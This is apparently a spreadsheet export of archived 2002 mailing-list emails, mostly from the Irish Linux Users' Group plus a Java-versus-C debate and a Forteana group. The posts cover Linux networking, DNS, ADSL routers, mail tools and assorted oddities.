RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 1 Sep 2002, Reza B'Far (eBuilt) wrote:&gt; 2.  C and C++ forces the developer to solve problems such as memory
&gt; management over and over again.  IMHO, Java is superior because the problem
&gt; of programming in the future is not about 0's and 1's, making the compiler
&gt; 2% faster, or making your code take 5% less memory... It's about design
&gt; patterns, architecture, high level stuff...Considering 90% of the fake job posting I see are for embedded systems or
device drivers - C still rules the world.&gt; 3.  Java is not just a programming language! It's also a platform... There
&gt; is NOTHING like the standard API's in Java in C and C++.  Everyone defines
&gt; their own API's, people end up solving the same problems ten different waysThe problem is the problem you're trying to solve is never the same. Java
will soon suffer API-rot (alot of poeple are already complaining about it),
it's just new. C was clean in the beginning too. API-rot is PURELY a
function of age.&gt; 4.  If you have a program of any type of high complexity written in C, you
&gt; can't possibly think that you could port it to different platforms within
&gt; the same magnitude of cost as Java....I do this all the time, It's alot easier then you think if the original
programmer had a clue at all... Java does remove the clue requirement tho,
just adds a huge testing requirement, QA guys aren't as cheap ;)&gt; 5.  Makes no sense for a scientific or a business project to depend on a
&gt; person... Java, IMHO, reduces the dependence of these entities on the
&gt; individual developer as it is much easier to reverse engineer Java as it is
&gt; to reverse engineer C (large applications).No it's not, but you can hire teams of Javites for cheap at your local high
school. Java is about cutting costs and commoditizing programming - and it's
working!- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt;
&gt; 6.  Hardware is getting so fast that I'm not sure if the performance
&gt; difference between Java and C/C++ are relevant any more.When out-of-the-box parsing &amp; transform of XML in java is 25x slower than
C++ on the same hardware then it does matter.</t>
  </si>
  <si>
    <t xml:space="preserve">Adam Beberg:
&gt;Considering 90% of the fake job posting I see are for embedded systems or 
&gt;device drivers - C still rules the world.There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ago._________________________________________________________________
Send and receive Hotmail on your mobile device: http://mobile.msn.com
</t>
  </si>
  <si>
    <t>On Sun, Sep 01, 2002 at 04:14:17PM +0100, Paul Jakma mentioned:
&gt; On Sun, 1 Sep 2002, kevin lyda wrote:
&gt; 
&gt; &gt; gnu date is limited by time_t.  but i thought time_t expired in 2037?
&gt; &gt; this seems to show it expiring in 2038:
&gt; 
&gt; (2^31-1)/3600/24/365+1970
&gt; 2038
&gt; 
&gt; course, on UltraSparc, x86-64, IA64, alpha, etc:
&gt; 
&gt; (2^63-1)/3600/24/365+1970
&gt; 292471210647
&gt; 
&gt; so we should be safe enough. May I assume that x86-64 will be able to use a 64bit time_t too? Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2 Sep 2002, Russell Turpin wrote:&gt; Adam Beberg:
&gt; &gt;Considering 90% of the fake job posting I see are for embedded systems or
&gt; &gt;device drivers - C still rules the world.
&gt;
&gt; There is a lot of C++ in the embedded world. With static object
&gt; allocation and a few other programming techniques, performance
&gt; differences disappear, but C++ gives a boost in development and
&gt; maintainability.Agreed, not much difference there. With C it just doesnt seem as wrong to
be crawling around in registers and things. Quite frankly you cant fit
_that_ big of a project into a 32K ROM, so large project issues dont matter
as much in the embedded world.And in the realtime space, or when you have data coming in at 2Gbit/sec
[fibrechannel], every cycle DOES count.&gt; The real issue is compiler availability. Almost every embedded platform
&gt; has C cross-compilers. Many have C++ compilers. But there is still a
&gt; range of platforms that have the first but not the second. Or at least,
&gt; that was the story a few years ago.Definately still very very true. C++ compilers are still a rarity.
- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.com
</t>
  </si>
  <si>
    <t>Dell Quinn
Account Executive
Fleishman-Hillard Saunders
15 Fitzwilliam Quay
Dublin 4
Ireland
Tel: 01 6188428
Fax: 01 6602244
Mobile: 086 6048101
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Reza B'Far wrote:
&gt;This thread kind of surprises me... I started coding with C, then C++, and
&gt;moved on to Java... And, I think that:Looks like a case of "MY experience is comprehensive, YOUR'S is
anecdotal, THEY don't know what they're talking about".
&gt;1.  The people who pay the wages don't give a flyin' heck what programming
&gt;language you write things in... they just want it to work.In my experience, they do care.  It has to work certainly, and in
particular it has to work with what they've already got, and it has to
work on client's systems.My limited experience of Java started a few years ago when support on
Linux was so terrible that I ran away screaming and haven't come back yet.Microsoft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again.Can't say I spend any noticeable amount of time on memory management
issues, apart from the fact that I frequently need &gt; 4 GB.
&gt;It's about design patterns, architecture, high level stuff...If your problem just requires application of a "design pattern" to solve,
then it's trivial anyway irrespective of language.
&gt;I am amazed by the amount of time wasted by people talking about low
&gt;level problems that have been solved 10 million times over and over
&gt;and over again...You appear to be gratuitously asserting that C programmers waste time
on irrelevant low-level problems and Java programmers don't.  Depends
entirely on the programmer, not the language.
&gt;3.  Java is not just a programming language! It's also a platform...Buzzword.
&gt;a monolithic set of API's or a crap load of different API's slicing
&gt;and dicing the same problems 50 different ways?Unsupported assertion.
&gt;4.  If you have a program of any type of high complexity written in C, you
&gt;can't possibly think that you could port it to different platforms within
&gt;the same magnitude of cost as Java....Dunno.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applications).You can pay a good programmer to solve your problem now, or else get
some kids to hack spaghetti Fortran in any language and then pay for
maintenance headaches ad infinitum. 
&gt;6.  Hardware is getting so fast that I'm not sure if the performance
&gt;difference between Java and C/C++ are relevant any more.Whoah!!!  Performance matters to me every day.  (Right now I'm taking
time out to write email while waiting for a job to run).  Sure I could
wait 5 years until everyone's PC is fast enough to generate random EC's
in no time, when any twit will be able to program inefficient code
that is fast enough and the market will be overrun by competitors,
or I can do it now when very few people can. 
&gt;The end goal is the scientific or business problem to be solved.Yes.
&gt;And for those problems, languages such as Java, SmallTalk, and others
&gt;allow you to think more high level than low level.  Thinking of bits
&gt;and bytes takes too much gray matter away from the real important
&gt;problems....It's true!  I admit everything!  Mea maxima culpa!  Working in C makes
me spend all day thinking base, rank thoughts about hard-core bitography!
Not.Actually I spend most of my time thinking in high-level mathematics.
&gt;Why do most computer scientists insist on solving the same problems
&gt;over and over again [...]Dunno, and frankly I don't see the relevance to the issue at hand.
I'm sure Java is fine for some stuff, as is C or whatever.  Horses for
courses.
Bye,
  Rob.
     .-.                                                               .-.
    /   \           .-.                                 .-.           /   \
   /     \         /   \       .-.     _     .-.       /   \         /     \
  /       \       /     \     /   \   / \   /   \     /     \       /       \
 /         \     /       \   /     `-'   `-'     \   /       \     /         \
            \   /         `-'                     `-'         \   /
             `-'                                               `-'</t>
  </si>
  <si>
    <t>I need to setup a VPN between a few sites. From what I've read, the the
choices come down (on the Linux side) to IPsec (using FreeSWAN) or CIPE.
It seems that FreeSWAN is 'better', being an implementation of IPsec which
is a standard. However, CIPE does the job as well for Linux clients and is
somewhat simpler to setup. The problem is that it's not a pure Linux situation - a couple of the sites
run OS-X. I'm pretty sure that I'll be able to find an implementation of
IPsec for OS-X, but I think CIPE is Linux only.So, the question is for those of you have have implemented BOTH - is there a
significant difference in setup time and hassle between CIPE and FreeSWAN ?
If CIPE is going to be much easier than dealing with FreeSWAN (and whatever
on the OS-X sites) then I'll simply get a Linux box for each of the remote
sites - with the low price of hardware, it doesn't take much more complexity
in software to make buying hardware to use simpler software economic.Niall-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>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don't know how
to set sendmail to run a command before it sends out the mail.  Do any of
the outgoing mailer programs, exim or postfix or whatever, have a 'nice'
configuration interface, or do they all have nice friendly configuration
files like sendmail.Any suggestions of alternative solutions would be much appreciated.  There
are only three or four email addresses in my domain, and setting it up for
scheduled collection and either scheduled or immediate delivery would do me
fine.Thanks,	David.David Hamilton
Senior Technical Consultant
HP Ireland -- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Hi All,
I'm trying to set up the following:1. A Linux server running with a modem for internet connectivity and an
ethernet card for LAN connectivity
2. Other LAN pcs with ethernet cards, using the Linux server for
DNS/DHCP etc.Basically, I want to route any non LAN traffic through the ppp0.I've got some of the way, but like a similar post earlier about modem
problems, when I am connected to the internet with eht0 up, the routing
is all incorrect and noting goes out through ppp0 (eh0 must be the
default route or something).Is there standard "out of the box" Linux tools that will carry out
portmapping on behalf of the LAN PCs ?  (I'm planning on non routable
addresses 192.168.x.x for the LAN, routed outwards via the ppp0
interface).Can someone point me at the right HOWTOs or routing documentation I need
to follow ? 
Thanks,
Dermot.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Hi Dermot, if have a look at one of the dists. like www.smoothwall.org, it
will save you lots of time and effort, and should do eveything you want.Justin&gt;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</si>
  <si>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I think I'll ask this question again, as I sent on friday afternoon.  :-) Justin &gt; Hi,
&gt; 
&gt; Can anyone point me to a howto on running mailing lists. Not looking for
&gt; anything that is  package specific, but rather something that 
&gt; gives general
&gt; info on the various Email headers and dealing with returned 
&gt; mails, errors in
&gt; transport etc..
&gt; 
&gt; Thanks
&gt; 
&gt; Justin
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Ray Dermody's [DERMODYR@ITCARLOW.IE] 20 lines of wisdom included:
&gt; Hi All,
&gt; The serial number in our hosts files on our DNS server has gone 
&gt; corrupt e.g. 2002082999999999901 should be 20002082901.
&gt; Its okay to set this back to todays date but I understand that our 
&gt; secondary and terninary DNS servers will only update from the master 
&gt; hosts file if the master host serial number is greater than the current 
&gt; serial number in the hosts file.
&gt; Is there any way I can reset this on the secondary and terninary DNS 
&gt; servers?Once you have the serial changed on the master DNS server, remove
the appropiate zone(s) on your slaves, and refresh your DNS servers.Bind has a special case, if you set the serial to '0' I think. DNS &amp;
Bind should have something on that.-- 
  Philip Reynolds        
   RFC Networks          tel: 01 8832063
www.rfc-networks.ie      fax: 01 8832041-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>-----BEGIN PGP SIGNED MESSAGE-----Vincent Cunniffe wrote:
| Justin MacCarthy wrote:
|
|&gt; I think I'll ask this question again, as I sent on friday afternoon.
  :-)
|
|
| Mailman ;-)
|
| Trust me, you do *not* want to running your own mailing lists
| on your own software.
|
| You'll wind up crying in a dark room looking for something
| high-voltage to stick your fingers into.All things considered, I get that effect with Mailman, but the viable
alternatives are ezmlm, which is loonware and I'm avoiding on principle,
and majordomo, which seems to have stagnated. Oh, and there's apparently
something called SmartList which is a bitch to set up.Waider.
- --
waider@waider.ie / Yes, it /is/ very personal of me
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.orgiQEVAwUBPXNE16HbXyzZsAb3AQH2KQf/XqeOMaHNXAlzbmgd5iYd9VQaAgWAR2DQ
kdpz0NbECR2OS7PJoLY9lsPKgNshpJcDZIRsxJvXmfp5YRNq0AyP0HGGwRvWgjgB
0N9HG/Rgez7S5RhU79RAuhpFb9XO1XzMI0gSkDHSGefQsUOAZ69vZVLLsiRiyHFy
4u+vrPVTP0rYR7haX41JXu42GVWfT2K2DDFftAimqGCsJnu2MXcMI/Ptq1rtxhXD
WZhxCR+FAwirEk8Yz9Drl8+gJL0YJQFSoWumQzqLKKutx1lJvv7OS4yDjGRaQpxm
Jmq8lifudZayccbixx7ZcXMSlpP4C45Wj5XJSYW8RCjU1bgxTqhMbQ==
=eG8X
-----END PGP SIGNATURE-----
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Justin MacCarthy wrote:
&gt; I think I'll ask this question again, as I sent on friday afternoon.  :-) Mailman ;-)Trust me, you do *not* want to running your own mailing lists
on your own software.You'll wind up crying in a dark room looking for something
high-voltage to stick your fingers into.Regards,Vin
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t xml:space="preserve">
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1Your actual serial number is 1519761310 - from a dig I've just done.Try resetting the zone number to 2002082901 - some of your secondaries seem 
to have a serial number below that, so they clearly regard 1519761310 as 
being less than 2002082601.That should enable them to pick up the new zonefile.T.At 11:49 02/09/2002 +0100, Ray Dermody wrote:
&gt;Hi All,
&gt;The serial number in our hosts files on our DNS server has gone
&gt;corrupt e.g. 2002082999999999901 should be 20002082901.
&gt;Its okay to set this back to todays date but I understand that our
&gt;secondary and terninary DNS servers will only update from the master
&gt;hosts file if the master host serial number is greater than the current
&gt;serial number in the hosts file.
&gt;Is there any way I can reset this on the secondary and terninary DNS
&gt;servers?
&gt;
&gt;Ray Dermody
&gt;Computing Services Technician
&gt;I.T. Carlow
&gt;0503 76271
&gt;
&gt;
&gt;--
&gt;Irish Linux Users' Group: ilug@linux.ie
&gt;http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
&gt;List maintainer: listmaster@linux.ieVIA NET.WORKS Ireland is a wholly owned Limited Irish Company.
Although connected to the VIA Global Network, VIA NET.WORKS Ireland
is separate from and is not owned by VIA NET.WORKS Inc. or any
member of the VIA NET.WORKS Inc. Group.
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use iQA/AwUBPXNFo76WYZbx1eG3EQLfNwCfakNapOkbg26j1jqQQEHgIWFd4s0AoP4J
GLBtgr1K8fzYlnnRNcfT3fSt
=Rurr
-----END PGP SIGNATURE-----
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Hi All,Damian Conway is in Belfast this week. He will be giving two talks:o Perl 6 - Tuesday, 3rd September, 7pm, Jury's, Belfast
o Quantum::Superpositions - Thursday, 5th September, 7pm, Jury's, BelfastHe is also doing training courses...
    http://www.kasei.com/training/damian/Wesley.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t xml:space="preserve">         |::::::::::::::::::::::::::::::::::::::::::::::::::|                IT's Monday 520      02 September 2002              |::::::::::::::::::::::::::::::::::::::::|STUDENT LIFE BEGINS WITH LINUX
by
John SterneThe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7.3.ILUG member Braun Brelin proposed this promotion, when he ran a
training class for staff at the UCC computer science department.
Brelin, who is the director of technology at OpenApp, says that the
Linux offer could be extended to any or all of the other Irish
universities.The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world.Red Hat Linux 7.3 incorporates ease of use and maintenance
features and is intended to counter objections that Linux is hard to
master on personal systems.The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one.Regards
L.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>I just saw the ISOs on an internal server here and was tempted....	D.-----Original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reason.Kate-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>ok, so if i was in the uk for a wekk, how might i configure my laptop to
dial in to a freebie isp?  redhat's internet connection wizard actually
has settings for uk isp's, but freeserve is the only one i recognize
and it doen't seem to work.has anyone here done this?kevin--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t>
  </si>
  <si>
    <t xml:space="preserve">Vernon,I'm changing the instructions in the SpamAssassin INSTALL file 
right now to:tar xfvz dcc-dccproc.tar.Z
cd dcc-dccproc-X.X.X
./configure &amp;&amp; make &amp;&amp; make install
cdcc 'info'
Let me know ASAP if that's innapropriate, since we're shipping 
2.40 today!COn Monday, September 2, 2002, at 10:02  AM, Vernon Schryver wrote:&gt;&gt; Here are the instructions in the spamassassin README:
&gt;&gt;
&gt;&gt;     # tar xfvz dcc-dccproc.tar.Z
&gt;&gt;     # cd dcc-dccproc-X.X.X
&gt;&gt;     # ./configure &amp;&amp; make &amp;&amp; make install
&gt;&gt;     # cdcc 'new map'
&gt;&gt;     # cdcc 'add dcc.rhyolite.com'
&gt;&gt;     # cdcc 'info'
&gt;
&gt; That's ok, except that the 'new map' and "add dcc.rhyolite.com'
&gt; are respectively unnecessary and wrong.  The map file that comes
&gt; with the source points to localhost and dcc.dcc-servers.net.  Those
&gt; two shipped entries usually do the right thing if there is a local
&gt; server.  If there is no local server or if the local server fails,
&gt; requests are instantly sent to one of the public server names listed
&gt; in the main DCC web page at
&gt; http://www.rhyolite.com/anti-spam/dcc/ and http://www.dcc-
&gt; servers.net/dcc/
&gt; dcc.rhyolite.com has not been listed for months.
</t>
  </si>
  <si>
    <t>On September 2, kialllists@redpie.com said:
&gt; OS-X is linux
&gt; Er, no it's not. It's kinda BSD-related, but it's definitely not
Linux.Waider.
-- 
waider@waider.ie / Yes, it /is/ very personal of me."Since I am project leader, I must not be permitted to go insane."
                                                                - Theo de Radt-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;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www.ibphoenix.com.Indeedy - I had never even heard of firebird until we started a new job
last week with a client who uses it.  So we popped it onto a box
downstairs and wow - it is fast.  Comes with some lovely client tools
also.  Supports all the db goodies, transactions, stored procedures,
triggers.&gt;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website.Fergal.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Here's a weird and wacky problem:I'm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teeth-grinding.This morning, in the office, the damn thing is working without a hitch.Anyone like to suggest what mystery technology is in use in the hotel 
that prevents serial ports from working under Linux?Cheers,
Waider.
-- 
waider@waider.ie / Yes, it /is/ very personal of me-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">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me.Kate-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">John P. Looney wrote:
&gt;  The only way you can resolve this, to my knowledge is to download the
&gt; original libvorbis rpm and the new one. Remove the old one, then do:
&gt; 
&gt;  rpm -Uvh libvorbis-*
&gt; 
&gt;  RPM then assumes that you want both versions installed at the same time,
&gt; and does so. Why you can't do this after you have one library already
&gt; installed is beyond me.Does using the --oldpackage flag help your pain, or is your pain caused 
by "Obsoletes" flags?Cheers,
Waider.
-- 
waider@waider.ie / Yes, it /is/ very personal of me-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">David Neary said:
&gt;
&gt; For the francophones among you, this article is a summary of the
&gt; reasons why most free software licences (and the GPL in
&gt; particular) are not valid in France.
&gt;
&gt; http://www.linuxfrench.net/article.php3?id_article=1043
&gt;
&gt; Google translation (hard to read most of the time, but good
&gt; enough to pick up the gist)
&gt;
&gt; http://makeashorterlink.com/?U26B52602
&gt;
&gt; In brief, in an international contract, when mentioning copyright,  you
&gt; must mention under which jurisdiction's laws the copyright
&gt; is applied. French law requires the licence to be available in
&gt; French (the GPL isn't). And French law requires that for a
&gt; contract to be valid, it must not breach existing law. Also under
&gt; French law, the copyright holder automatically retains the right
&gt; to change the licence, which means that French law is in conflict
&gt; with the GPL, which requires authorisation from all authors
&gt; before a licence change is allowed.
&gt;
&gt; Also there's some stuff about French consumer law forbidding sale
&gt; without guarantee of anything, so software delivered as-is
&gt; breaches consumer law in France. But I didn't really follow that.My French is a bit iffy these days, but if this is true, does it not also
nullify Microsoft, Adobe and WinZip licences amongst most others? These all
claim no liability, no guarantees (M$ say delivered "with all faults", so
at least they are honest)./Ciaran.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Is there a way to get my read email downloaded off webmail.eircom.net.I've been reading the emails using the web based interface. But I've
reached my quota limit. There doesn't seem to be any way to get the
emails off the server. I can connect to the account using POP, but that
only retrieves unread emails. There's also no way to mark emails as
unread from the html interface.Is there a way I can use fetchmail perhaps to get it to pull down all
the emails and remove them off the server.It's been years since I've used fetchmail, I don't recall be able to do
this.Any other suggestions welcome. There's a few hundred email so I don't
fancy going through each one forwarding it to another account.Glen
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Seems fetchmail has a -a switch to get it all.Just need to install fetchmail now :)GlenOn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</si>
  <si>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 xml:space="preserve">It seems to only support PPPoA and not PPPoE. You need one that supports
PPPoE, if you want torun it in routed IP mode. If you are using it as a
bridge, it'll probably work, but you'd be left leaving the computer on,
which would defeat the purpose of getting a router.The best router I've come accross is the Zyxel 643. Eircom supply this,
but if you have alook online you can probably find it cheaper to buy
online from America or the UK.Hope this is useful,
Joe
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, Oct 07, 2002 at 09:43:11AM +0100, Ciaran Johnston wrote:&gt;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
</t>
  </si>
  <si>
    <t xml:space="preserve">having great fun trying to find a dumb ADSL modem with Ethernet
presentation, everybody wants to sell routers but I intend on doing pppoe
from another device, something with more than one Ethernet port would be
nice.
anybody got any recommendations ?Uly----- Original Message -----
From: 
To: 
Cc: 
Sent: Monday, October 07, 2002 10:35 AM
Subject: Re: [ILUG] adsl router modem combo
&gt; It seems to only support PPPoA and not PPPoE. You need one that supports
&gt; PPPoE, if you want torun it in routed IP mode. If you are using it as a
&gt; bridge, it'll probably work, but you'd be left leaving the computer on,
&gt; which would defeat the purpose of getting a router.
&gt;
&gt; The best router I've come accross is the Zyxel 643. Eircom supply this,
&gt; but if you have alook online you can probably find it cheaper to buy
&gt; online from America or the UK.
&gt;
&gt; Hope this is useful,
&gt; Joe
&gt;
&gt;
&gt; --
&gt; Irish Linux Users' Group: ilug@linux.ie
&gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription
information.
&gt; List maintainer: listmaster@linux.ie
&gt;-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, Oct 06, 2002 at 11:10:05PM +0100, Declan de Lacy Murphy wrote:
&gt; I am planning to get i-stream solo and share it across a small network
&gt; (wireless), but I don't want to have to pay eircom for a router and having a
&gt; noisy pc running constantly isn't really an option because at home
&gt; inevitably someone will unplug it.
&gt; 
&gt; I have been looking at a number of products and although I read the thread
&gt; about eircom needing pppoe last august I am still not sure if the one that I
&gt; am interested in will do the job. It is a hawking technology ar 710
&gt;  http://www.hawkingtech.com/products/ar710.htm ) and if it does the job it
&gt; will actually be cheaper than the modem eircom is selling.
&gt; 
&gt; I would really appreciate if someone could look at the spec on the hawking
&gt; web page and give me an opinion.
&gt; 
&gt; Thanks in advance
&gt; 
&gt; Declan
&gt; I got the DSL-W 906E from http://www.dsl-warehouse.co.uk.Though it's not at all the best one around I have to say it does the job
and a bit. Some of the features can be a pain to get working (ie. pptp in
pppoe mode - can't figure it out). The documentation is not the best, but
the guys from http://www.dsl-warehouse.co.uk will help you ouit. They
also have a message board.The command line interface is quite powerful, but absolutely not
userfriendly.All in all it's a cheap desent performer, that I am happy enough with.
Got this one including a microfilter (not needed) for 140euro including
shipping. Better than any deal from Eircom.-Tor
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">--- In forteana@y..., "Webmaster"  wrote:
&gt;Right...Talking Stick!..but what the hell is "marathon/snickers, jif/cif 
&gt;and
&gt;calls itself 'Secret Chiefs' "
&gt;
&gt;DRS
&gt;Rebranding: taking something and changing nothing about it except its name. 
In the UK Marathon bars became Snickers bar, Jif cleaning fluid became Cif 
and Talking Stick became Secret Chiefs, y'know?Scott
"at once a fun fair, a petrified forest, and the great temple of Amun at 
Karnak, itself drunk, and reeling in an eccentric earthquake"
_________________________________________________________________
Join the worldï¿½s largest e-mail service with MSN Hotmail. 
http://www.hotmail.com
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Plan to Sell a Home?
http://us.click.yahoo.com/J2SnNA/y.lEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">
----- Original Message -----
From: "Scott Wood" 
To: 
Sent: Monday, October 07, 2002 6:51 AM
Subject: [zzzzteana] Re: Megalithomania UnPissup
&gt; --- In forteana@y..., "Webmaster"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Yahoo! Groups Sponsor ---------------------~--&gt;
Home Selling? Try Us!
http://us.click.yahoo.com/QrPZMC/iTmEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">So, I've been letting the little .exe of SETI@Home run endlessly on my PC .  Last total for this upgrade approx.
420 hours of scanning time.  And still no ET.  I'm so disappointed.
Does anyone else on the list let Berkeley use their computer for research in this manner?
http://setiathome.berkeley.edu
DRS[Non-text portions of this message have been removed]
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">http://www.washingtonpost.com/wp-dyn/articles/A46455-2002Oct5.htmlA New Theory on Mapping the New WorldBy Guy Gugliotta
Washington Post Staff Writer
Monday, October 7, 2002; Page A07In 1507, a group of scholars working in France produced an extraordinary map
of the world, the first to put the still-recent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well-shaped, not only on the
east coast, where explorers had already sailed, but also on the west coast
-- which no European was known to have seen.
The ice cream cone bulge that sticks out into the Pacific at the junction of
modern-day Chile and Peru is readily visible and in almost exactly the right
geographical spot -- not only in the main map, but also in an inset printed
along its top.
The shape of South America in the main map appears distorted because of the
curvature of the Earth.
It is an improbable coincidence, if it was a coincidence, for the map -- 12
large printed pages to be arrayed in one 36-square-foot wall display -- was
published six years before Vasco Balboa's 1513 trip across the Isthmus of
Panama and 12 years before Ferdinand Magellan's 1519-22 trip around the
world.
Did someone get there earlier?
...------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">Understand, not enough caffeine absorbed yet this morning. (7:00AM here for
me)DRS&gt; --- In forteana@y..., "Webmaster"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Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">Ananova:Â  
Man admits Soham kidnapping hoax callsA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Yahoo! Groups Sponsor ---------------------~--&gt;
Plan to Sell a Home?
http://us.click.yahoo.com/J2SnNA/y.lEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">&gt; That always amazes me about 'regular' dreams - how often they come true.
&gt;
In 1993 or so, when I was a student in Edinburgh, I had a bad dream about
being chased around a house by a scary murderous tramp who was carrying a
bag full of half-penny coins (which had long since ceased to be legal
tender). The next morning as I left the flat, I found a half-penny on the
doormat right outside our door. Fair gave me the willies, that did.TimC------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Plan to Sell a Home?
http://us.click.yahoo.com/J2SnNA/y.lEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
